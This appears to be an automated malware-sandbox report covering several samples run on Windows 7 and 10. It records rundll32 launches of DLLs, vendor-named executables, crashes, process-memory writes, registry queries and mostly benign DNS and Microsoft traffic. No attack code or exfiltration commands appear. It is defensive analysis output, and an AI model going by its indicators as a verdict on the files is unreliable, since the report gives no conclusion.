"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1272,i,13544508926340531097,6671217806016090640,262144 --variations-seed-version --mojo-platform-channel-handle=4224 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

95s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-filesystem-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-filesystem-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

79s

Max time network

100s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\x86\VSLauncher_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\files\x86\VSLauncher_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\files\x86\VSLauncher_[0MB]_[1].exe"

Network

Country Destination Domain Proto
US 52.111.229.43:443 tcp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-synch-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-synch-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 84.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240611-en

Max time kernel

92s

Max time network

112s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-sysinfo-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-sysinfo-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

56s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-convert-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-convert-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20240611-en

Max time kernel

118s

Max time network

119s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\AsIO.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 1960 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1960 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1960 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1960 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1960 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1960 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1752 wrote to memory of 1960 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\AsIO.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\AsIO.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20240221-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\x86\HDHelper_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\files\x86\HDHelper_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\files\x86\HDHelper_[0MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

124s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\files\x86\NvStereoUtilityOGL_[1MB]_[1].exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\files\x86\NvStereoUtilityOGL_[1MB]_[1].exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\x86\NvStereoUtilityOGL_[1MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\files\x86\NvStereoUtilityOGL_[1MB]_[1].exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 932 -ip 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 932 -ip 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 932 -s 568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,5047420736443372512,9747851268033796534,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-rtlsupport-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-core-rtlsupport-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win7-20240221-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\x86\VSLauncher_[0MB]_[1].exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\files\x86\VSLauncher_[0MB]_[1].exe

"C:\Users\Admin\AppData\Local\Temp\files\x86\VSLauncher_[0MB]_[1].exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

51s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ASUS_WMI.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1504 wrote to memory of 2020 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1504 wrote to memory of 2020 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1504 wrote to memory of 2020 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ASUS_WMI.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\ASUS_WMI.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2020 -ip 2020

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 560

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

150s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-environment-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-environment-l1-1-0.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

N/A

Analysis: behavioral32

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:25

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-heap-l1-1-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\x86\api-ms-win-crt-heap-l1-1-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 145.83.221.88.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.200.10:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-18 17:22

Reported

2024-06-18 17:23

Platform

win10v2004-20240508-en

Max time kernel

80s

Max time network

81s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\files\vcruntime140.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133632049957882548" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 848 wrote to memory of 3500 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 848 wrote to memory of 3500 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 848 wrote to memory of 3500 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4372 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 4800 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4372 wrote to memory of 1232 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
